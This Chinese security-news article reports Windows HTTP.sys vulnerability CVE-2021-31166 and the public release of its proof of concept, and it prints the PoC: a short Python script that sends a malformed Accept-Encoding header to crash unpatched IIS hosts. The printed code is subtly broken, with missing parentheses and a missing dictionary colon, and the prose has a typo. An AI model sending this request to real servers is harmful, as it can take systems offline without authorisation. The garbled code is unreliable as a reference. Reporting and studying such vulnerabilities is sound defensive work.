Windows操作系统HTTP协议栈内存破坏漏洞PoC公开

安全 网站安全
CVE-2021-31166漏洞是Windows操作系统中HTTP 协议栈的内存破坏漏洞。该协议栈是Windows内置的IIS 服务器使用的。如果IIS 服务器启用,攻击者就可以发送伪造的包来在操作系统kernel上执行也代码。

[[400112]]

 5月微软补丁日修复了一个CVSSv3评分9.8分的严重安全漏洞,该漏洞CVE编号为CVE-2021-31166。近日,有研究人员在GitHub上公布了该漏洞的PoC代码。

CVE-2021-31166漏洞是Windows操作系统中HTTP 协议栈的内存破坏漏洞。该协议栈是Windows内置的IIS 服务器使用的。如果IIS 服务器启用,攻击者就可以发送伪造的包来在操作系统kernel上执行也代码。微软称该漏洞可以被用来创建网络蠕虫,因此建议优先修复。

虽然该漏洞CVSS评分为9.8分,听起来非常危险,但该漏洞只影响最新的一些Windows版本,具体影响Windows 10、Windows server 2004、Windows server 20H2的不同版本。

5月17日,安全研究人员Axel Souchet在GitHub上公开了该漏洞的PoC代码。该PoC代码可以使运行IIS 服务器的未修复的Windows系统奔溃,但是并没有实现蠕虫功能。

PoC代码参见:https://github.com/0vercl0k/CVE-2021-31166

import requests 
import argparse 
  
  
def main(): 
    parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys'
    parser.add_argument('--target', required = True
    args = parser.parse_args() 
    r = requests.get(f'http://{args.target}/', headers = { 
        'Accept-Encoding''doar-e, ftw, imo, ,'
    }) 
    print(r) 
  • 1.
  • 2.
  • 3.
  • 4.
  • 5.
  • 6.
  • 7.
  • 8.
  • 9.
  • 10.
  • 11.
  • 12.

PoC视频参见: https://github.com/0vercl0k/CVE-2021-31166/blob/main/pics/trigger.gif

本文翻译自:https://therecord.media/poc-released-for-wormable-windows-iis-bug/如若转载,请注明原文地址。

 

责任编辑:姜华 来源: 嘶吼网
相关推荐

2010-01-20 10:38:54

2009-10-26 08:50:44

Windows 7竞争苹果

2021-07-22 23:16:15

2025-01-07 13:36:51

2010-01-25 11:28:59

2022-02-10 07:13:40

SSH协议客户端服务端

2022-08-04 08:44:31

Android系统攻击链

2013-07-11 09:25:49

2010-04-20 14:17:21

Unix操作系统

2022-11-28 07:21:53

操作系统内存管理

2020-10-15 10:54:31

安全漏洞微软

2020-12-25 10:08:30

漏洞Windows操作系统

2009-09-04 10:47:33

2010-04-15 11:41:40

Unix操作系统

2009-12-04 17:54:07

Windows 7操作

2009-12-08 18:02:50

2009-08-17 08:32:56

Linux操作系统内存管理Linux

2023-04-07 09:12:11

2021-11-10 11:51:33

BrakTooth安全漏洞蓝牙设备

2009-12-16 09:40:26

Linux操作系统
点赞
收藏

51CTO技术栈公众号